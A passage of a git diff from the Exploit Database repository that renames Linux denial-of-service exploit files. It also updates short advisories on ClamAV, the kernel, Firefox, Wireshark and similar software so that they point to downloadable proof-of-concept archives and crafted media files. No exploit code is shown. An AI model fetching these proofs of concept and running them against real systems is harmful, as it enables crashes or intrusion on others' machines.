+8,4 @@ Exploiting this issue could allow attacker-supplied machine code to execute in t ClamAV versions 0.88.2 and 0.88.3 are vulnerable to this issue; prior versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28348.exe \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/28348.exe \ No newline at end of file diff --git a/platforms/linux/dos/28358.txt b/exploits/linux/dos/28358.txt similarity index 93% rename from platforms/linux/dos/28358.txt rename to exploits/linux/dos/28358.txt index 292329ae0..40fcd0e67 100644 --- a/platforms/linux/dos/28358.txt +++ b/exploits/linux/dos/28358.txt @@ -6,4 +6,4 @@ Remote attackers may trigger this issue by sending crafted UDP datagrams to affe Linux kernel versions 2.6.14.4, 2.6.17.6, and 2.6.17.7 are vulnerable to this issue; other versions in the 2.6 series are also likely affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28358.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/28358.tar.gz \ No newline at end of file diff --git a/platforms/linux/dos/28367.txt b/exploits/linux/dos/28367.txt similarity index 93% rename from platforms/linux/dos/28367.txt rename to exploits/linux/dos/28367.txt index 354252ede..8f8eae6f5 100644 --- a/platforms/linux/dos/28367.txt +++ b/exploits/linux/dos/28367.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to execute arbitrary code within the contex AlsaPlayer 0.99.76, the CVS version as of 9 Aug 2006, and prior versions are vulnerable to this issue; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28367.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/28367.zip \ No newline at end of file diff --git a/platforms/linux/dos/28380.txt b/exploits/linux/dos/28380.txt similarity index 93% rename from platforms/linux/dos/28380.txt rename to exploits/linux/dos/28380.txt index 28c5e1d18..e8978a812 100644 --- a/platforms/linux/dos/28380.txt +++ b/exploits/linux/dos/28380.txt @@ -6,4 +6,4 @@ Attackers may likely exploit this issue to execute arbitrary machine code in the Mozilla Firefox is vulnerable to this issue. Due to code reuse, other Mozilla products are also likely affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28380.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/28380.zip \ No newline at end of file diff --git a/platforms/linux/dos/28383.txt b/exploits/linux/dos/28383.txt similarity index 92% rename from platforms/linux/dos/28383.txt rename to exploits/linux/dos/28383.txt index 897b4cf69..308a288fb 100644 --- a/platforms/linux/dos/28383.txt +++ b/exploits/linux/dos/28383.txt @@ -6,4 +6,4 @@ This issue allows attackers to execute arbitrary machine code in the context of ImageMagick versions in the 6.x series, up to version 6.2.8, are vulnerable to this issue. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28383.sgi \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/28383.sgi \ No newline at end of file diff --git a/platforms/linux/dos/28384.txt b/exploits/linux/dos/28384.txt similarity index 92% rename from platforms/linux/dos/28384.txt rename to exploits/linux/dos/28384.txt index ce3d36c24..edec2e8f2 100644 --- a/platforms/linux/dos/28384.txt +++ b/exploits/linux/dos/28384.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to execute arbitrary code within the contex Versions 2.1.2, SVN 8406, and prior are vulnerable to this issue; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28384.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/28384.zip \ No newline at end of file diff --git a/platforms/linux/dos/28386.txt b/exploits/linux/dos/28386.txt similarity index 100% rename from platforms/linux/dos/28386.txt rename to exploits/linux/dos/28386.txt diff --git a/platforms/linux/dos/28391.html b/exploits/linux/dos/28391.html similarity index 100% rename from platforms/linux/dos/28391.html rename to exploits/linux/dos/28391.html diff --git a/platforms/linux/dos/28683.txt b/exploits/linux/dos/28683.txt similarity index 100% rename from platforms/linux/dos/28683.txt rename to exploits/linux/dos/28683.txt diff --git a/platforms/linux/dos/28775.pl b/exploits/linux/dos/28775.pl similarity index 100% rename from platforms/linux/dos/28775.pl rename to exploits/linux/dos/28775.pl diff --git a/platforms/linux/dos/28816.txt b/exploits/linux/dos/28816.txt similarity index 100% rename from platforms/linux/dos/28816.txt rename to exploits/linux/dos/28816.txt diff --git a/platforms/linux/dos/28895.txt b/exploits/linux/dos/28895.txt similarity index 86% rename from platforms/linux/dos/28895.txt rename to exploits/linux/dos/28895.txt index 1b96d7da3..7345a3d4e 100644 --- a/platforms/linux/dos/28895.txt +++ b/exploits/linux/dos/28895.txt @@ -4,4 +4,4 @@ The Linux kernel is prone to a local denial-of-service vulnerability. An attacker can exploit this issue to crash the affected computer, denying service to legitimate users. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28895.img.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/28895.img.gz \ No newline at end of file diff --git a/platforms/linux/dos/28912.txt b/exploits/linux/dos/28912.txt similarity index 88% rename from platforms/linux/dos/28912.txt rename to exploits/linux/dos/28912.txt index bae98db34..4f863f451 100644 --- a/platforms/linux/dos/28912.txt +++ b/exploits/linux/dos/28912.txt @@ -4,4 +4,4 @@ The Linux kernel is prone to a local denial-of-service vulnerability. This issue An attacker can exploit this issue to crash the affected computer, denying service to legitimate users. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28912.iso.bz2 \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/28912.iso.bz2 \ No newline at end of file diff --git a/platforms/linux/dos/2892.py b/exploits/linux/dos/2892.py similarity index 100% rename from platforms/linux/dos/2892.py rename to exploits/linux/dos/2892.py diff --git a/platforms/linux/dos/2893.py b/exploits/linux/dos/2893.py similarity index 100% rename from platforms/linux/dos/2893.py rename to exploits/linux/dos/2893.py diff --git a/platforms/linux/dos/291.c b/exploits/linux/dos/291.c similarity index 100% rename from platforms/linux/dos/291.c rename to exploits/linux/dos/291.c diff --git a/platforms/linux/dos/2928.py b/exploits/linux/dos/2928.py similarity index 100% rename from platforms/linux/dos/2928.py rename to exploits/linux/dos/2928.py diff --git a/platforms/linux/dos/29296.txt b/exploits/linux/dos/29296.txt similarity index 100% rename from platforms/linux/dos/29296.txt rename to exploits/linux/dos/29296.txt diff --git a/platforms/linux/dos/29399.txt b/exploits/linux/dos/29399.txt similarity index 92% rename from platforms/linux/dos/29399.txt rename to exploits/linux/dos/29399.txt index b9258a71e..926005b53 100644 --- a/platforms/linux/dos/29399.txt +++ b/exploits/linux/dos/29399.txt @@ -4,4 +4,4 @@ Multiple PDF readers are prone to multiple remote buffer-overflow vulnerabilitie An attacker may be able exploit this issue to execute arbitrary code within the context of the affected application. In some circumstances, the vulnerability can be exploited only to cause a denial of service. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29399.pdf \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/29399.pdf \ No newline at end of file diff --git a/platforms/linux/dos/29458.txt b/exploits/linux/dos/29458.txt similarity index 100% rename from platforms/linux/dos/29458.txt rename to exploits/linux/dos/29458.txt diff --git a/platforms/linux/dos/29470.txt b/exploits/linux/dos/29470.txt similarity index 100% rename from platforms/linux/dos/29470.txt rename to exploits/linux/dos/29470.txt diff --git a/platforms/linux/dos/29473.txt b/exploits/linux/dos/29473.txt similarity index 100% rename from platforms/linux/dos/29473.txt rename to exploits/linux/dos/29473.txt diff --git a/platforms/linux/dos/29520.txt b/exploits/linux/dos/29520.txt similarity index 89% rename from platforms/linux/dos/29520.txt rename to exploits/linux/dos/29520.txt index af3a378cf..501f5bc07 100644 --- a/platforms/linux/dos/29520.txt +++ b/exploits/linux/dos/29520.txt @@ -4,4 +4,4 @@ Applications using the gtk2 library may be prone to a denial-of-service vulnerab An attacker can exploit this issue to crash applications on a victim's computer. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29520.mbox \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/29520.mbox \ No newline at end of file diff --git a/platforms/linux/dos/2954.html b/exploits/linux/dos/2954.html similarity index 100% rename from platforms/linux/dos/2954.html rename to exploits/linux/dos/2954.html diff --git a/platforms/linux/dos/29683.txt b/exploits/linux/dos/29683.txt similarity index 100% rename from platforms/linux/dos/29683.txt rename to exploits/linux/dos/29683.txt diff --git a/platforms/linux/dos/29713.html b/exploits/linux/dos/29713.html similarity index 100% rename from platforms/linux/dos/29713.html rename to exploits/linux/dos/29713.html diff --git a/platforms/linux/dos/29716.txt b/exploits/linux/dos/29716.txt similarity index 100% rename from platforms/linux/dos/29716.txt rename to exploits/linux/dos/29716.txt diff --git a/platforms/linux/dos/29717.txt b/exploits/linux/dos/29717.txt similarity index 100% rename from platforms/linux/dos/29717.txt rename to exploits/linux/dos/29717.txt diff --git a/platforms/linux/dos/29720.txt b/exploits/linux/dos/29720.txt similarity index 100% rename from platforms/linux/dos/29720.txt rename to exploits/linux/dos/29720.txt diff --git a/platforms/linux/dos/29723.txt b/exploits/linux/dos/29723.txt similarity index 92% rename from platforms/linux/dos/29723.txt rename to exploits/linux/dos/29723.txt index 85a5fd698..7156249f3 100644 --- a/platforms/linux/dos/29723.txt +++ b/exploits/linux/dos/29723.txt @@ -10,4 +10,4 @@ Firefox 2.0.0.2 is prone to this issue; other versions may also be affected. GIMP version 2.2.12 is also reported vulnerable; a segmentation fault occurs when the application processes a malicious GIF image. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29723.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/29723.zip \ No newline at end of file diff --git a/platforms/linux/dos/29724.txt b/exploits/linux/dos/29724.txt similarity index 100% rename from platforms/linux/dos/29724.txt rename to exploits/linux/dos/29724.txt diff --git a/platforms/linux/dos/29781.c b/exploits/linux/dos/29781.c similarity index 100% rename from platforms/linux/dos/29781.c rename to exploits/linux/dos/29781.c diff --git a/platforms/linux/dos/29809.txt b/exploits/linux/dos/29809.txt similarity index 90% rename from platforms/linux/dos/29809.txt rename to exploits/linux/dos/29809.txt index 613290c7c..0ba201460 100644 --- a/platforms/linux/dos/29809.txt +++ b/exploits/linux/dos/29809.txt @@ -6,4 +6,4 @@ Exploiting this issue allows remote attackers to consume excessive system resour PulseAudio 0.9.5 is vulnerable to this issue. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29809.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/29809.zip \ No newline at end of file diff --git a/platforms/linux/dos/29826.txt b/exploits/linux/dos/29826.txt similarity index 100% rename from platforms/linux/dos/29826.txt rename to exploits/linux/dos/29826.txt diff --git a/platforms/linux/dos/29916.c b/exploits/linux/dos/29916.c similarity index 100% rename from platforms/linux/dos/29916.c rename to exploits/linux/dos/29916.c diff --git a/platforms/linux/dos/29920.py b/exploits/linux/dos/29920.py similarity index 100% rename from platforms/linux/dos/29920.py rename to exploits/linux/dos/29920.py diff --git a/platforms/linux/dos/29939.txt b/exploits/linux/dos/29939.txt similarity index 100% rename from platforms/linux/dos/29939.txt rename to exploits/linux/dos/29939.txt diff --git a/platforms/linux/dos/30020.txt b/exploits/linux/dos/30020.txt similarity index 100% rename from platforms/linux/dos/30020.txt rename to exploits/linux/dos/30020.txt diff --git a/platforms/linux/dos/30024.txt b/exploits/linux/dos/30024.txt similarity index 93% rename from platforms/linux/dos/30024.txt rename to exploits/linux/dos/30024.txt index 46e1ea219..c2e2cc65a 100644 --- a/platforms/linux/dos/30024.txt +++ b/exploits/linux/dos/30024.txt @@ -6,4 +6,4 @@ Successful exploits of this vulnerability allow remote attackers to execute arbi Versions of libexif prior to 0.6.14 are vulnerable to this issue. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30024.jpg \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30024.jpg \ No newline at end of file diff --git a/platforms/linux/dos/30080.c b/exploits/linux/dos/30080.c similarity index 100% rename from platforms/linux/dos/30080.c rename to exploits/linux/dos/30080.c diff --git a/platforms/linux/dos/30091.py b/exploits/linux/dos/30091.py similarity index 100% rename from platforms/linux/dos/30091.py rename to exploits/linux/dos/30091.py diff --git a/platforms/linux/dos/30110.c b/exploits/linux/dos/30110.c similarity index 100% rename from platforms/linux/dos/30110.c rename to exploits/linux/dos/30110.c diff --git a/platforms/linux/dos/3023.c b/exploits/linux/dos/3023.c similarity index 100% rename from platforms/linux/dos/3023.c rename to exploits/linux/dos/3023.c diff --git a/platforms/linux/dos/30251.c b/exploits/linux/dos/30251.c similarity index 100% rename from platforms/linux/dos/30251.c rename to exploits/linux/dos/30251.c diff --git a/platforms/linux/dos/30430.txt b/exploits/linux/dos/30430.txt similarity index 100% rename from platforms/linux/dos/30430.txt rename to exploits/linux/dos/30430.txt diff --git a/platforms/linux/dos/30444.txt b/exploits/linux/dos/30444.txt similarity index 100% rename from platforms/linux/dos/30444.txt rename to exploits/linux/dos/30444.txt diff --git a/platforms/linux/dos/30542.txt b/exploits/linux/dos/30542.txt similarity index 100% rename from platforms/linux/dos/30542.txt rename to exploits/linux/dos/30542.txt diff --git a/platforms/linux/dos/30578.txt b/exploits/linux/dos/30578.txt similarity index 100% rename from platforms/linux/dos/30578.txt rename to exploits/linux/dos/30578.txt diff --git a/platforms/linux/dos/30579.txt b/exploits/linux/dos/30579.txt similarity index 100% rename from platforms/linux/dos/30579.txt rename to exploits/linux/dos/30579.txt diff --git a/platforms/linux/dos/30580.txt b/exploits/linux/dos/30580.txt similarity index 100% rename from platforms/linux/dos/30580.txt rename to exploits/linux/dos/30580.txt diff --git a/platforms/linux/dos/30584.py b/exploits/linux/dos/30584.py similarity index 100% rename from platforms/linux/dos/30584.py rename to exploits/linux/dos/30584.py diff --git a/platforms/linux/dos/306.c b/exploits/linux/dos/306.c similarity index 100% rename from platforms/linux/dos/306.c rename to exploits/linux/dos/306.c diff --git a/platforms/linux/dos/30646.txt b/exploits/linux/dos/30646.txt similarity index 100% rename from platforms/linux/dos/30646.txt rename to exploits/linux/dos/30646.txt diff --git a/platforms/linux/dos/30648.txt b/exploits/linux/dos/30648.txt similarity index 91% rename from platforms/linux/dos/30648.txt rename to exploits/linux/dos/30648.txt index b37471034..3498cbf1b 100644 --- a/platforms/linux/dos/30648.txt +++ b/exploits/linux/dos/30648.txt @@ -6,4 +6,4 @@ Exploiting this issue allows attackers to execute arbitrary machine code in the This issue affects versions prior to AlsaPlayer 0.99.80-rc3. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30648.ogg \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30648.ogg \ No newline at end of file diff --git a/platforms/linux/dos/30724.txt b/exploits/linux/dos/30724.txt similarity index 100% rename from platforms/linux/dos/30724.txt rename to exploits/linux/dos/30724.txt diff --git a/platforms/linux/dos/30744.txt b/exploits/linux/dos/30744.txt similarity index 100% rename from platforms/linux/dos/30744.txt rename to exploits/linux/dos/30744.txt diff --git a/platforms/linux/dos/30763.php b/exploits/linux/dos/30763.php similarity index 100% rename from platforms/linux/dos/30763.php rename to exploits/linux/dos/30763.php diff --git a/platforms/linux/dos/30766.c b/exploits/linux/dos/30766.c similarity index 100% rename from platforms/linux/dos/30766.c rename to exploits/linux/dos/30766.c diff --git a/platforms/linux/dos/30776.txt b/exploits/linux/dos/30776.txt similarity index 91% rename from platforms/linux/dos/30776.txt rename to exploits/linux/dos/30776.txt index 598a07ea4..b8698f6ce 100644 --- a/platforms/linux/dos/30776.txt +++ b/exploits/linux/dos/30776.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to crash the application, resulting in denial-o LIVE555 Media Server 2007.11.01 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30776.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30776.zip \ No newline at end of file diff --git a/platforms/linux/dos/30837.txt b/exploits/linux/dos/30837.txt similarity index 92% rename from platforms/linux/dos/30837.txt rename to exploits/linux/dos/30837.txt index 36d2ac050..cc6b8a50c 100644 --- a/platforms/linux/dos/30837.txt +++ b/exploits/linux/dos/30837.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to cause denial-of-service conditions. Given th QEMU 0.9.0 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30837.rar \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30837.rar \ No newline at end of file diff --git a/platforms/linux/dos/30894.txt b/exploits/linux/dos/30894.txt similarity index 93% rename from platforms/linux/dos/30894.txt rename to exploits/linux/dos/30894.txt index be34d537e..cd08d4333 100644 --- a/platforms/linux/dos/30894.txt +++ b/exploits/linux/dos/30894.txt @@ -6,4 +6,4 @@ Successfully exploiting these issues will allow an attacker to execute arbitrary These issues affect PeerCast 0.12.17, SVN 334 and prior versions. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30894.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30894.zip \ No newline at end of file diff --git a/platforms/linux/dos/30895.pl b/exploits/linux/dos/30895.pl similarity index 100% rename from platforms/linux/dos/30895.pl rename to exploits/linux/dos/30895.pl diff --git a/platforms/linux/dos/30898.pl b/exploits/linux/dos/30898.pl similarity index 100% rename from platforms/linux/dos/30898.pl rename to exploits/linux/dos/30898.pl diff --git a/platforms/linux/dos/30902.c b/exploits/linux/dos/30902.c similarity index 100% rename from platforms/linux/dos/30902.c rename to exploits/linux/dos/30902.c diff --git a/platforms/linux/dos/30942.c b/exploits/linux/dos/30942.c similarity index 100% rename from platforms/linux/dos/30942.c rename to exploits/linux/dos/30942.c diff --git a/platforms/linux/dos/30956.txt b/exploits/linux/dos/30956.txt similarity index 100% rename from platforms/linux/dos/30956.txt rename to exploits/linux/dos/30956.txt diff --git a/platforms/linux/dos/30985.txt b/exploits/linux/dos/30985.txt similarity index 100% rename from platforms/linux/dos/30985.txt rename to exploits/linux/dos/30985.txt diff --git a/platforms/linux/dos/31002.txt b/exploits/linux/dos/31002.txt similarity index 100% rename from platforms/linux/dos/31002.txt rename to exploits/linux/dos/31002.txt diff --git a/platforms/linux/dos/31018.txt b/exploits/linux/dos/31018.txt similarity index 78% rename from platforms/linux/dos/31018.txt rename to exploits/linux/dos/31018.txt index 986a28ef6..270688aae 100644 --- a/platforms/linux/dos/31018.txt +++ b/exploits/linux/dos/31018.txt @@ -6,7 +6,7 @@ Successfully exploiting this issue allows remote attackers to deny service to le These issues affect GStreamer 0.10.15; other versions may also be vulnerable. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31018-1.mpg -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31018-2.mpg -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31018-3.m2v -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31018-4.m2v \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31018-1.mpg +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31018-2.mpg +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31018-3.m2v +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31018-4.m2v \ No newline at end of file diff --git a/platforms/linux/dos/31054.txt b/exploits/linux/dos/31054.txt similarity index 93% rename from platforms/linux/dos/31054.txt rename to exploits/linux/dos/31054.txt index e83b3396b..aca94fd48 100644 --- a/platforms/linux/dos/31054.txt +++ b/exploits/linux/dos/31054.txt @@ -6,4 +6,4 @@ Attackers can leverage this issue to execute arbitrary code in the context of an Versions prior to SDL_image 1.2.7 are vulnerable. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31054.gif \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31054.gif \ No newline at end of file diff --git a/platforms/linux/dos/31218.txt b/exploits/linux/dos/31218.txt similarity index 90% rename from platforms/linux/dos/31218.txt rename to exploits/linux/dos/31218.txt index b64ff120e..ada8ef2d0 100644 --- a/platforms/linux/dos/31218.txt +++ b/exploits/linux/dos/31218.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue allows remote attackers to crash the affected This issue affects freeSSHd 1.2.0 and prior versions. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31218.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31218.zip \ No newline at end of file diff --git a/platforms/linux/dos/31220.py b/exploits/linux/dos/31220.py similarity index 100% rename from platforms/linux/dos/31220.py rename to exploits/linux/dos/31220.py diff --git a/platforms/linux/dos/31305.c b/exploits/linux/dos/31305.c similarity index 100% rename from platforms/linux/dos/31305.c rename to exploits/linux/dos/31305.c diff --git a/platforms/linux/dos/31440.txt b/exploits/linux/dos/31440.txt similarity index 100% rename from platforms/linux/dos/31440.txt rename to exploits/linux/dos/31440.txt diff --git a/platforms/linux/dos/31444.txt b/exploits/linux/dos/31444.txt similarity index 100% rename from platforms/linux/dos/31444.txt rename to exploits/linux/dos/31444.txt diff --git a/platforms/linux/dos/31552.txt b/exploits/linux/dos/31552.txt similarity index 91% rename from platforms/linux/dos/31552.txt rename to exploits/linux/dos/31552.txt index 6f2846a07..0fced18fb 100644 --- a/platforms/linux/dos/31552.txt +++ b/exploits/linux/dos/31552.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow attackers to cause crashes and deny service to These issues affect Wireshark 0.99.2 up to and including 0.99.8. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31552.pcap \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31552.pcap \ No newline at end of file diff --git a/platforms/linux/dos/31553.txt b/exploits/linux/dos/31553.txt similarity index 91% rename from platforms/linux/dos/31553.txt rename to exploits/linux/dos/31553.txt index 6d664c474..21809c7ef 100644 --- a/platforms/linux/dos/31553.txt +++ b/exploits/linux/dos/31553.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow attackers to cause crashes and deny service to These issues affect Wireshark 0.99.2 up to and including 0.99.8. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31553.pcap \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31553.pcap \ No newline at end of file diff --git a/platforms/linux/dos/31554.txt b/exploits/linux/dos/31554.txt similarity index 92% rename from platforms/linux/dos/31554.txt rename to exploits/linux/dos/31554.txt index f207eb458..e3b2d9442 100644 --- a/platforms/linux/dos/31554.txt +++ b/exploits/linux/dos/31554.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow attackers to cause crashes and deny service to These issues affect Wireshark 0.99.2 up to and including 0.99.8. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31554.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31554.gz \ No newline at end of file diff --git a/platforms/linux/dos/31594.html b/exploits/linux/dos/31594.html similarity index 100% rename from platforms/linux/dos/31594.html rename to exploits/linux/dos/31594.html diff --git a/platforms/linux/dos/31713.py b/exploits/linux/dos/31713.py similarity index 100% rename from platforms/linux/dos/31713.py rename to exploits/linux/dos/31713.py diff --git a/platforms/linux/dos/31761.txt b/exploits/linux/dos/31761.txt similarity index 100% rename from platforms/linux/dos/31761.txt rename to exploits/linux/dos/31761.txt diff --git a/platforms/linux/dos/31815.html b/exploits/linux/dos/31815.html similarity index 100% rename from platforms/linux/dos/31815.html rename to exploits/linux/dos/31815.html diff --git a/platforms/linux/dos/31915.py b/exploits/linux/dos/31915.py similarity index 100% rename from platforms/linux/dos/31915.py rename to exploits/linux/dos/31915.py diff --git a/platforms/linux/dos/31965.c b/exploits/linux/dos/31965.c similarity index 100% rename from platforms/linux/dos/31965.c rename to exploits/linux/dos/31965.c diff --git a/platforms/linux/dos/31966.c b/exploits/linux/dos/31966.c similarity index 100% rename from platforms/linux/dos/31966.c rename to exploits/linux/dos/31966.c diff --git a/platforms/linux/dos/31968.txt b/exploits/linux/dos/31968.txt similarity index 100% rename from platforms/linux/dos/31968.txt rename to exploits/linux/dos/31968.txt diff --git a/platforms/linux/dos/31979.html b/exploits/linux/dos/31979.html similarity index 100% rename from platforms/linux/dos/31979.html rename to exploits/linux/dos/31979.html diff --git a/platforms/linux/dos/31984.txt b/exploits/linux/dos/31984.txt similarity index 90% rename from platforms/linux/dos/31984.txt rename to exploits/linux/dos/31984.txt index c6e8f75bc..d41581cf8 100644 --- a/platforms/linux/dos/31984.txt +++ b/exploits/linux/dos/31984.txt @@ -6,4 +6,4 @@ Successful exploits can allow attackers to crash the affected browser, resulting This issue affects Firefox 3 running on Ubuntu Linux 8.04; other versions running on different platforms may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31984.jpg \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31984.jpg \ No newline at end of file diff --git a/platforms/linux/dos/32000.txt b/exploits/linux/dos/32000.txt similarity index 100% rename from platforms/linux/dos/32000.txt rename to exploits/linux/dos/32000.txt diff --git a/platforms/linux/dos/32018.txt b/exploits/linux/dos/32018.txt similarity index 90% rename from platforms/linux/dos/32018.txt rename to exploits/linux/dos/32018.txt index febf239a3..e439f61d2 100644 --- a/platforms/linux/dos/32018.txt +++ b/exploits/linux/dos/32018.txt @@ -6,4 +6,4 @@ This issue arises when the software handles maliciously crafted SVG images. According to reports, the latest versions of Firefox, Evince, EoG, and GIMP are vulnerable. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32018.svg \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32018.svg \ No newline at end of file diff --git a/platforms/linux/dos/32019.txt b/exploits/linux/dos/32019.txt similarity index 93% rename from platforms/linux/dos/32019.txt rename to exploits/linux/dos/32019.txt index f5354ac98..cb194d503 100644 --- a/platforms/linux/dos/32019.txt +++ b/exploits/linux/dos/32019.txt @@ -6,4 +6,4 @@ Remote attackers can exploit this issue by enticing victims into opening malicio Successful exploits may allow attackers to execute arbitrary code within the context of an affected application. Failed exploit attempts will likely result in a denial of service. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32019.iki \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32019.iki \ No newline at end of file diff --git a/platforms/linux/dos/32095.pl b/exploits/linux/dos/32095.pl similarity index 100% rename from platforms/linux/dos/32095.pl rename to exploits/linux/dos/32095.pl diff --git a/platforms/linux/dos/32112.txt b/exploits/linux/dos/32112.txt similarity index 100% rename from platforms/linux/dos/32112.txt rename to exploits/linux/dos/32112.txt diff --git a/platforms/linux/dos/32248.txt b/exploits/linux/dos/32248.txt similarity index 100% rename from platforms/linux/dos/32248.txt rename to exploits/linux/dos/32248.txt diff --git a/platforms/linux/dos/32292.rb b/exploits/linux/dos/32292.rb similarity index 100% rename from platforms/linux/dos/32292.rb rename to exploits/linux/dos/32292.rb diff --git a/platforms/linux/dos/32304.txt b/exploits/linux/dos/32304.txt similarity index 100% rename from platforms/linux/dos/32304.txt rename to exploits/linux/dos/32304.txt diff --git a/platforms/linux/dos/32348.txt b/exploits/linux/dos/32348.txt similarity index 100% rename from platforms/linux/dos/32348.txt rename to exploits/linux/dos/32348.txt diff --git a/platforms/linux/dos/32384.txt b/exploits/linux/dos/32384.txt similarity index 100% rename from platforms/linux/dos/32384.txt rename to exploits/linux/dos/32384.txt diff --git a/platforms/linux/dos/32451.txt b/exploits/linux/dos/32451.txt similarity index 100% rename from platforms/linux/dos/32451.txt rename to exploits/linux/dos/32451.txt diff --git a/platforms/linux/dos/32452.txt b/exploits/linux/dos/32452.txt similarity index 93% rename from platforms/linux/dos/32452.txt rename to exploits/linux/dos/32452.txt index 40f2a7111..070c323b3 100644 --- a/platforms/linux/dos/32452.txt +++ b/exploits/linux/dos/32452.txt @@ -17,4 +17,4 @@ UPDATE (September 4, 2009): Mac OS X 10.6 reportedly ships with Flash Player 10. UPDATE (June 10, 2010): Flash Player 10.1.53.64 and 9.0.227.0 are available. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32452.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32452.zip \ No newline at end of file diff --git a/platforms/linux/dos/32471.txt b/exploits/linux/dos/32471.txt similarity index 100% rename from platforms/linux/dos/32471.txt rename to exploits/linux/dos/32471.txt diff --git a/platforms/linux/dos/32551.txt b/exploits/linux/dos/32551.txt similarity index 100% rename from platforms/linux/dos/32551.txt rename to exploits/linux/dos/32551.txt diff --git a/platforms/linux/dos/32675.py b/exploits/linux/dos/32675.py similarity index 100% rename from platforms/linux/dos/32675.py rename to exploits/linux/dos/32675.py diff --git a/platforms/linux/dos/32682.c b/exploits/linux/dos/32682.c similarity index 100% rename from platforms/linux/dos/32682.c rename to exploits/linux/dos/32682.c diff --git a/platforms/linux/dos/32696.txt b/exploits/linux/dos/32696.txt similarity index 100% rename from platforms/linux/dos/32696.txt rename to exploits/linux/dos/32696.txt diff --git a/platforms/linux/dos/32697.pl b/exploits/linux/dos/32697.pl similarity index 100% rename from platforms/linux/dos/32697.pl rename to 